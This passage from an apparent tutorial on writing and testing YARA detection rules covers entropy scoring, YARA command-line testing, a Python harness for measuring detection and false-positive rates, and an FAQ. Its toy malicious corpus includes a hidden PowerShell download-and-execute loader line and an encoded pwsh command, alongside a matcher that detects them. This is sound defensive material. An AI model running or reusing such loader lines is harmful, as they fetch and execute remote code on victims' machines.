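    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

padding = b"\x00" * 1024                    # one repeated value
uniform = bytes(range(256)) * 4             # every byte value equally often
stub = b"This program cannot be run in DOS mode."
random_like = os.urandom(65536)             # stand-in for compressed or encrypted data

for name, blob in [("padding", padding), ("uniform", uniform),
                   ("stub text", stub), ("random", random_like)]:
    print(f"{name:10s} {shannon_entropy(blob):.2f}")
```

Constant padding scores 0 and a perfectly uniform distribution scores 8. Plain text and ordinary code sit well below the threshold, while compressed or encrypted sections land close to 8, which is why a cutoff around 7.5 separates them reasonably well.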

Step 7 — Test before you ship

Every rule needs to be evaluated against two corpora: a known-bad set you expect it to match, and a known-good set you expect it not to. The YARA CLI handles both:

# Match a single rule against a single file
yara my_rules.yar suspicious.bin

# Match the rules against a directory tree (-r recurses into subdirectories)
yara -r my_rules.yar /samples/malware/

# Verbose output (prints which strings matched and where)
yara -s my_rules.yar suspicious.bin

# Count matches without listing them
yara -c my_rules.yar /samples/clean/

A rule that fires on more than a handful of clean files is broken, even if it looks elegant. Trim the strings or tighten the condition before you commit it.
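The two-corpus check is easy to script once it has to run on every rule change. The Python sketch below keeps the harness independent of any YARA binding by taking a matcher callable; the toy matcher, the sample names, and the function name evaluate are all assumptions for illustration. With yara-python installed, a matcher along the lines of lambda data: bool(rules.match(data=data)) over a compiled ruleset would slot in instead.

```python
def evaluate(matcher, known_bad, known_good):
    """Run a matcher over two labelled corpora and report misses and false hits.

    matcher: callable taking bytes and returning True on a match.
    known_bad / known_good: dicts mapping sample name -> bytes.
    """
    missed = sorted(name for name, data in known_bad.items() if not matcher(data))
    false_positives = sorted(name for name, data in known_good.items() if matcher(data))
    detected = len(known_bad) - len(missed)
    return {
        "detection_rate": detected / len(known_bad) if known_bad else 0.0,
        "missed": missed,
        "false_positives": false_positives,
    }

def toy_matcher(data: bytes) -> bool:
    """Stand-in for a compiled rule: host string plus one staging primitive."""
    lowered = data.lower()
    return b"powershell" in lowered and b"downloadstring" in lowered

known_bad = {
    "loader_a.ps1": b"powershell -w hidden IEX (New-Object Net.WebClient).DownloadString('x')",
    "loader_b.bat": b"pwsh -enc SQBFAFgA",
}
known_good = {
    "readme.txt": b"Run the installer from a PowerShell prompt.",
    "build.cmd": b"msbuild project.sln /t:Rebuild",
}
report = evaluate(toy_matcher, known_bad, known_good)
print(report)
```

The report lists which bad samples were missed and which clean files fired, which is usually more actionable than a bare count.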

Frequently Asked Questions

Is YARA a replacement for antivirus?

No. AV products do scheduled scanning, on-access protection, behavioural blocking, and signature distribution. YARA is a pattern-matching engine you point at a corpus or feed via integration. The two are complementary: AV blocks known threats in real time; YARA gives you a language for the patterns AV cannot express.

How do I integrate YARA with Defender for Endpoint?

MDE does not consume YARA rules directly, but it consumes indicators and custom detections. The workflow is: write a YARA rule, generate matching hashes / file properties, and push those as MDE indicators. For more expressive detection, use Sigma rules converted to KQL for Microsoft Sentinel or Defender advanced hunting.

What is the performance impact of complex rules?

Regular expressions and large condition sets dominate runtime. Keep "any of" checks over large string sets cheap, prefer hex over regex, and put cheap conditions (filesize, uint16(0)) first so YARA can short-circuit before evaluating the expensive parts.

Can I write rules for non-PE files?

Yes — YARA works on any file. The elf and macho modules exist for Linux and macOS binaries; the dotnet module exposes managed-assembly structure; PDFs, Office documents, and scripts all match plain strings and regexes happily.

Where do I find good rule sets to learn from?

The Yara-Rules/rules repository on GitHub is the community baseline. Vendor rule sets from Trend Micro, Florian Roth (Neo23x0/signature-base), and Elastic Security are good for studying real-world patterns. Always read a community rule before deploying it — they vary in false-positive risk.

Conclusion

YARA is the first language defenders should learn after they understand the basics of file formats. The rules you write encode the threats you have actually seen, in a form that scales across millions of files and integrates with most of the security stack. Start with the three-section anatomy, build rules around N-of-M conditions over short string sets, and test against both malicious and benign corpora before deploying. Within a few months you will have a small, maintainable ruleset that does more useful triage work than the average analyst's inbox.

Related Posts

Authoritative reference: YARA Documentation.